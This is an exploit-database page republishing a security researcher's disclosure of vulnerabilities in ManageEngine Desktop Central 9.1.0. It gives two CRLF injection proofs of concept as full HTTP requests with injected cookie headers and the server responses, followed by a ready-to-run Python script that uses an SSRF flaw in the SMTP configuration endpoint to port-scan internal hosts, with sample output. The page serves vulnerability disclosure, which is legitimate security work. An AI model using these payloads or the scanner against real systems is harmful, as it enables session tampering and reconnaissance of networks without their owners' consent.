Advertisement






Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery

CVE Category Price Severity
CWE-93 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-03-27
CPE
cpe:URL-NOT-AVAILABLE
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030052

Below is a copy:

Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-02-14
# Software Link : http://www.desktopcentral.com
# Tested Version: 9.1.0 (Build No: 91084)
# Tested on:  Windows 10

# Vulnerability Type: CRLF injection (CRLF) - 1

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93

Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.

Proof of concept:

GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost

Response:
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
X-dc-header: yes
Content-Length: 95
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/csv;charset=UTF-8


# Vulnerability Type: CRLF injection (CRLF) - 2

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93

Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.

Proof of concept:

GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost


HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
X-dc-header: yes
Content-Length: 4470
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf;charset=UTF-8



# Vulnerability Type: Server-Side Request Forgery (SSRF)

CVSS v3: 8.0
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-918 Server-Side Request Forgery (SSRF)

Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability
in ManageEngine Desktop Central 9.1.0 allows an attacker can force a
vulnerable server to trigger malicious requests to third-party servers or
to internal resources. This vulnerability allows authenticated attacker
with network access via HTTP and can then be leveraged to launch specific
attacks such as a cross-site port attack, service enumeration, and various
other attacks.

Proof of concept:

Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
change the variable sitevuln value with ip address:

import argparse
from termcolor import colored
import requests
import urllib3
import datetime
urllib3.disable_warnings()

print(colored('''
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
''',"red"))

def smtpConfig_ssrf(target,port,d):
    now1 = datetime.datetime.now()
    text = ''
    sitevuln = 'localhost'
    url = 'https://
'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%
40manageengine.com
&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%
40manageengine.com'
    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;
buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;
JSESSIONID=D10A9C62D985A0966647099E14C622F8;
DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
    try:
        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0
(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':
'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '
https://192.168.56.250:8383/smtpConfig.do','Cookie':
        cookie,'Connection': 'keep-alive'},verify=False, timeout=10)

        text = response.text
        now2 = datetime.datetime.now()
        rest = (now2 - now1)
        seconds = rest.total_seconds()

        if ('updateRefMsgCookie' in text):
            return colored('Cookie lost',"yellow")

        if d == "0":
            print ('Time response: ' + str(rest) + '\n' + text + '\n')

        if (seconds > 5.0):
            return colored('open',"green")
        else:
            return colored('closed',"red")

    except:
        now2 = datetime.datetime.now()
        rest = (now2 - now1)
        seconds = rest.total_seconds()
        if (seconds > 10.0):
            return colored('open',"green")
        else:
            return colored('closed',"red")

    return colored('unknown',"yellow")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -
SSRF Open ports",required=True)
    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9
- SSRF Open ports",required=True)
    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central
9 - SSRF Open ports (0 print or 1 no print)",required=False)
    args = parser.parse_args()
    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')



And:

$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080

------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------

192.168.56.250:8080 open

$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777

------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------

192.168.56.250:7777 closed

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum